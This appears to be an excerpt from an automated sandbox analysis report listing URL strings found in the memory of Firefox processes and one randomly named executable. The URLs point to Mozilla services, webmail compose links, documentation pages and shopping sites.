Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitConfiguration
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C24448A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001B.00000002.3632371300.000001C23D11F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com2e1fac17-9068-4561-b72a-c1e101be76f9extensions.langpacks.signatures
Source: firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3609227343.000001C23C021000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C3D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6E73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5386000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestbug-1648229-rollout-comcast-steering-rollout-relea
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206512868.000001C23E161000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239B6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206512868.000001C23E161000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206512868.000001C23E161000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001B.00000002.3640448626.000001C23DD70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 0000001B.00000002.3640448626.000001C23DD70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3654754835.000001C23FD05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239B6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150637847.000001C23BE3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610655302.000001C23C303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150450150.000001C23BE1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150800700.000001C23BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610655302.000001C23C377000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150183043.000001C23C300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/aboutConfigPrefs.onPrefChange
Source: firefox.exe, 0000001B.00000002.3641525579.000001C23DED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 0000001B.00000002.3654754835.000001C23FDA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F1C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F1C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C24448A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F123000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5312000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/Routed
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/http://mozilla.org/#/properties/branches/anyOf/1/items/properties/featur
Source: firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C24448A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3622884951.000001C23C918000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3654754835.000001C23FD87000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_DEV_SYNC_RS
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_DEV_SYNC_RSDISCOVERY_STREAM_FEEDS_UPDATEDISCOVERY_S
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D00B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D15A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jscolor-mix(in
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D006000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D00B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D15A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CFE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CFA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelSHUTDOWN_PHASE_DURATION_TICKS_PROFILE_CHANGE_NET
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239B6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001B.00000002.3651042917.000001C23ED85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3646061223.000001C23E6C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191276571.000001C23ED85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/firefox-relay-integration
Source: firefox.exe, 0000001B.00000002.3649402880.000001C23EB29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B96F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3646061223.000001C23E6A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E088000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpchrome://browser/con
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3654583430.000001C23FCA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingschrome://browser/content/mi
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesstartMigration
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation.unified-extensions-context-menu-move-widget-downr
Source: 79ddad050f.exe, 0000000A.00000003.3237477005.0000000005A5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.orgchrome://browser/skin/menu.svgdevice-connected-notification_migrateXULSto
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239B6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com/
Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E02D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D12D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191842126.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
